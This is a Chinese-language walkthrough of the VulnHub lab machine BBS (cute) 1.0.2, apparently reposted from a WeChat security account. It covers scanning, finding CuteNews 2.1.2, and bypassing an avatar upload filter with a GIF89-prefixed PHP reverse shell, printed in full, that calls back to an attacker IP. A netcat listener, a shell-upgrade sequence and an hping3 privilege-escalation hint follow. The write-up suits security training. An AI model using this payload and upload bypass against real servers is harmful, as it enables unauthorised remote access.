"各自乘流而上、互为欢喜人间,万里星光,一如既往"
项目地址:
https://www.vulnhub.com/entry/bbs-cute-102,567/
对目标主机进行探测
sudo nmap -sP 192.168.33.1/24
IP:192.168.33.142端口服务探测
sudo nmap -sC -sV 192.168.33.142 -oN BBS_CUTE.nmap
对开放的80、88端口进行目录扫描
sudo gobuster dir -u http://192.168.33.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium
http://192.168.33.142/index.php 发现入口
注册页面的验证码无法显示,需要自己访问下面的地址去拿CMS 是 CuteNews 2.1.2 去 exploit-db 看下,
有一个 RCE 漏洞,下 POC 来用一下
修改一下 payload,运行python3 48800.py http://192.168.33.142/index.php
利用失败
有个上传头像的地方,看下能不能上传 shell
经过测试会过滤不是图片开头的 shell,反弹 shell payload
|
GIF89; <?php // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw. // Copyright (C) 2007 [email protected] set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.33.150';$port = 4444; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated");break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$stringn"; } } ? |
上传成功,攻击机监听
nc -lvvp 4444访问http://192.168.33.142/uploads/avatar_test2_revshell_pitcure.php
反弹成功:
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermctrl+zstty -a #57 116stty raw -echo;fgresetstty rows x columns y
提权:
/usr/sbin/hping3
原文始发于微信公众号(0x00实验室):VulnHub靶机 | BBS_Cute:1.0.2 上传绕过
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论